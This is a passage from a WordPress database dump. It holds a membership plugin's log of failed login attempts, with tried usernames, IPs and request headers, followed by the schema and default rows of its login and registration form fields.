05:44:25'),(95819,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58902\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747095263.904701;s:12:\"REQUEST_TIME\";i:1747095263;}}','43.205.255.0',1,'2025-05-13 05:44:25','2025-05-14 05:44:25'),(95820,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58901\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747095263.904623;s:12:\"REQUEST_TIME\";i:1747095263;}}','43.205.255.0',1,'2025-05-13 05:44:25','2025-05-14 05:44:25'),(95821,0,'a:2:{s:8:\"username\";s:4:\"root\";s:6:\"server\";a:41:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:27:\"/wp-login.php?wp_lang=en_US\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=e6525919423dff83daa5771b01efeffc; _uid=rB8jg2gi6U4ZzjiTAwP7Ag==\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"57\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52430\";s:11:\"REMOTE_ADDR\";s:13:\"45.135.232.10\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"57\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:13:\"wp_lang=en_US\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747118418.363555;s:12:\"REQUEST_TIME\";i:1747118418;}}','45.135.232.10',0,'2025-05-13 12:10:19','1970-01-01 00:00:00'),(95822,0,'a:2:{s:8:\"username\";s:10:\"etomidetka\";s:6:\"server\";a:41:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:27:\"/wp-login.php?wp_lang=en_US\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=31ce5beac5f9ba040a2f6a7f8598d324; _uid=rB8jg2gjWdN+CDP5AxnZAg==\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"73\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55055\";s:11:\"REMOTE_ADDR\";s:13:\"45.135.232.10\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"73\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:13:\"wp_lang=en_US\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747147223.0754449;s:12:\"REQUEST_TIME\";i:1747147223;}}','45.135.232.10',0,'2025-05-13 20:10:24','1970-01-01 00:00:00'),(95823,0,'a:2:{s:8:\"username\";s:4:\"Bury\";s:6:\"server\";a:41:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:27:\"/wp-login.php?wp_lang=en_US\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=bb6d1004d459c27315da3566c6b281c7; _uid=rB8jg2gkSiGP8xZoAy0WAg==\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"59\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61806\";s:11:\"REMOTE_ADDR\";s:13:\"45.135.232.10\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"59\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:13:\"wp_lang=en_US\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747208740.8327971;s:12:\"REQUEST_TIME\";i:1747208740;}}','45.135.232.10',0,'2025-05-14 13:15:42','1970-01-01 00:00:00');
/*!40000 ALTER TABLE `wp_arm_fail_attempts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_form_field`
--

DROP TABLE IF EXISTS `wp_arm_form_field`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_form_field` (
  `arm_form_field_id` int(11) NOT NULL AUTO_INCREMENT,
  `arm_form_field_form_id` int(11) NOT NULL,
  `arm_form_field_order` int(11) NOT NULL DEFAULT 0,
  `arm_form_field_slug` varchar(255) DEFAULT NULL,
  `arm_form_field_option` longtext DEFAULT NULL,
  `arm_form_field_bp_field_id` int(11) NOT NULL DEFAULT 0,
  `arm_form_field_status` int(1) NOT NULL DEFAULT 1,
  `arm_form_field_created_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  PRIMARY KEY (`arm_form_field_id`)
) ENGINE=InnoDB AUTO_INCREMENT=103 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_form_field`
--

LOCK TABLES `wp_arm_form_field` WRITE;
/*!40000 ALTER TABLE `wp_arm_form_field` DISABLE KEYS */;
INSERT INTO `wp_arm_form_field` VALUES (1,1,1,'user_login','a:10:{s:2:\"id\";s:10:\"user_login\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"user_login\";s:8:\"required\";s:1:\"1\";s:13:\"hide_username\";s:1:\"0\";s:13:\"blank_message\";s:30:\"Username can not be left blank\";s:15:\"invalid_message\";s:27:\"Please enter valid username\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(2,1,2,'first_name','a:9:{s:2:\"id\";s:10:\"first_name\";s:5:\"label\";s:10:\"First Name\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"first_name\";s:8:\"required\";s:1:\"1\";s:14:\"hide_firstname\";s:1:\"0\";s:13:\"blank_message\";s:33:\"First Name can not be left blank.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(3,1,3,'last_name','a:9:{s:2:\"id\";s:9:\"last_name\";s:5:\"label\";s:9:\"Last Name\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:9:\"last_name\";s:8:\"required\";s:1:\"1\";s:13:\"hide_lastname\";s:1:\"0\";s:13:\"blank_message\";s:32:\"Last Name can not be left blank.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(4,1,4,'user_email','a:9:{s:2:\"id\";s:10:\"user_email\";s:5:\"label\";s:13:\"Email Address\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:8:\"meta_key\";s:10:\"user_email\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:36:\"Email Address can not be left blank.\";s:15:\"invalid_message\";s:33:\"Please enter valid email address.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(5,1,5,'user_pass','a:9:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:7:\"options\";a:8:{s:14:\"strength_meter\";s:1:\"1\";s:15:\"strong_password\";s:1:\"0\";s:9:\"minlength\";s:1:\"6\";s:9:\"maxlength\";s:0:\"\";s:7:\"special\";s:1:\"1\";s:7:\"numeric\";s:1:\"1\";s:9:\"uppercase\";s:1:\"1\";s:9:\"lowercase\";s:1:\"1\";}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid password.\";}',0,1,'2023-03-28 07:20:18'),(6,1,6,'','a:4:{s:2:\"id\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(7,2,1,'user_login','a:13:{s:2:\"id\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:2:{s:9:\"minlength\";s:0:\"\";s:9:\"maxlength\";s:0:\"\";}s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:10:\"user_login\";s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(8,2,2,'user_pass','a:10:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:13:\"default_field\";s:1:\"1\";s:7:\"options\";a:8:{s:14:\"strength_meter\";s:1:\"0\";s:15:\"strong_password\";s:1:\"0\";s:9:\"minlength\";s:1:\"1\";s:9:\"maxlength\";s:1:\"0\";s:7:\"special\";s:1:\"0\";s:7:\"numeric\";s:1:\"0\";s:9:\"uppercase\";s:1:\"0\";s:9:\"lowercase\";s:1:\"0\";}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:27:\"Please enter valid password\";}',0,1,'2023-03-28 07:20:18'),(9,2,3,'rememberme','a:7:{s:2:\"id\";s:10:\"rememberme\";s:4:\"type\";s:10:\"rememberme\";s:13:\"default_field\";s:1:\"1\";s:11:\"default_val\";s:7:\"forever\";s:5:\"label\";s:11:\"Remember me\";s:8:\"meta_key\";s:10:\"rememberme\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(10,2,4,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:5:\"LOGIN\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(11,3,1,'user_login','a:13:{s:2:\"id\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:2:{s:9:\"minlength\";s:0:\"\";s:9:\"maxlength\";s:0:\"\";}s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:10:\"user_login\";s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(12,3,2,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:6:\"Submit\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(13,4,2,'user_pass','a:12:{s:2:\"id\";s:9:\"user_pass\";s:4:\"type\";s:8:\"password\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:12:\"New Password\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:7:{s:9:\"minlength\";s:1:\"6\";s:9:\"maxlength\";s:0:\"\";s:14:\"strength_meter\";s:1:\"1\";s:7:\"special\";s:1:\"1\";s:7:\"numeric\";s:1:\"1\";s:9:\"uppercase\";s:1:\"1\";s:9:\"lowercase\";s:1:\"1\";}s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:9:\"user_pass\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(14,4,3,'repeat_pass','a:11:{s:2:\"id\";s:11:\"repeat_pass\";s:4:\"type\";s:11:\"repeat_pass\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:16:\"Confirm Password\";s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:11:\"repeat_pass\";s:13:\"blank_message\";s:39:\"Confirm Password can not be left blank.\";s:15:\"invalid_message\";s:22:\"Passwords don\'t match.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";i:13;}',0,1,'2023-03-28 07:20:18'),(15,4,3,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:6:\"Submit\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(16,5,1,'user_login','a:10:{s:2:\"id\";s:10:\"user_login\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"user_login\";s:8:\"required\";s:1:\"1\";s:13:\"hide_username\";s:1:\"0\";s:13:\"blank_message\";s:30:\"Username can not be left blank\";s:15:\"invalid_message\";s:27:\"Please enter valid username\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(17,5,2,'first_name','a:9:{s:2:\"id\";s:10:\"first_name\";s:5:\"label\";s:10:\"First Name\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"first_name\";s:8:\"required\";s:1:\"1\";s:14:\"hide_firstname\";s:1:\"0\";s:13:\"blank_message\";s:33:\"First Name can not be left blank.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(18,5,3,'last_name','a:9:{s:2:\"id\";s:9:\"last_name\";s:5:\"label\";s:9:\"Last Name\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:9:\"last_name\";s:8:\"required\";s:1:\"1\";s:13:\"hide_lastname\";s:1:\"0\";s:13:\"blank_message\";s:32:\"Last Name can not be left blank.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(19,5,4,'user_email','a:9:{s:2:\"id\";s:10:\"user_email\";s:5:\"label\";s:13:\"Email Address\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:8:\"meta_key\";s:10:\"user_email\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:36:\"Email Address can not be left blank.\";s:15:\"invalid_message\";s:33:\"Please enter valid email address.\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(20,5,5,'user_pass','a:9:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:7:\"options\";a:8:{s:14:\"strength_meter\";s:1:\"1\";s:15:\"strong_password\";s:1:\"0\";s:9:\"minlength\";s:1:\"6\";s:9:\"maxlength\";s:0:\"\";s:7:\"special\";s:1:\"1\";s:7:\"numeric\";s:1:\"1\";s:9:\"uppercase\";s:1:\"1\";s:9:\"lowercase\";s:1:\"1\";}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid password.\";}',0,1,'2023-03-28 07:20:18'),(21,5,6,'','a:4:{s:2:\"id\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";}',0,1,'2023-03-28 07:20:18'),(22,6,1,'user_login','a:14:{s:2:\"id\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:2:{s:9:\"minlength\";s:0:\"\";s:9:\"maxlength\";s:0:\"\";}s:8:\"required\";s:1:\"1\";s:13:\"hide_username\";i:0;s:8:\"meta_key\";s:10:\"user_login\";s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(23,6,2,'user_pass','a:10:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:8:\"Password\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:13:\"default_field\";s:1:\"1\";s:7:\"options\";a:8:{s:14:\"strength_meter\";s:1:\"0\";s:15:\"strong_password\";s:1:\"0\";s:9:\"minlength\";s:1:\"1\";s:9:\"maxlength\";s:1:\"0\";s:7:\"special\";s:1:\"0\";s:7:\"numeric\";s:1:\"0\";s:9:\"uppercase\";s:1:\"0\";s:9:\"lowercase\";s:1:\"0\";}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";s:1:\"1\";s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:27:\"Please enter valid password\";}',0,1,'2023-03-28 07:20:18'),(24,6,3,'rememberme','a:6:{s:2:\"id\";s:10:\"rememberme\";s:4:\"type\";s:10:\"rememberme\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:11:\"Remember me\";s:8:\"meta_key\";s:10:\"rememberme\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(25,6,4,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:5:\"LOGIN\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 07:20:18'),(26,7,1,'user_login','a:14:{s:2:\"id\";s:10:\"user_login\";s:4:\"type\";s:4:\"text\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:8:\"Username\";s:11:\"placeholder\";s:0:\"\";s:7:\"options\";a:2:{s:9:\"minlength\";s:0:\"\";s:9:\"maxlength\";s:0:\"\";}s:8:\"required\";s:1:\"1\";s:8:\"meta_key\";s:10:\"user_login\";s:13:\"hide_username\";i:0;s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:6:\"prefix\";s:0:\"\";s:6:\"suffix\";s:0:\"\";s:12:\"ref_field_id\";s:1:\"0\";}',0,1,'2023-03-28 07:20:18'),(27,7,2,'','a:5:{s:2:\"id\";s:6:\"submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";s:1:\"1\";s:5:\"label\";s:6:\"Submit\";s:8:\"meta_key\";s:0:\"\";}',0,1,'2023-03-28 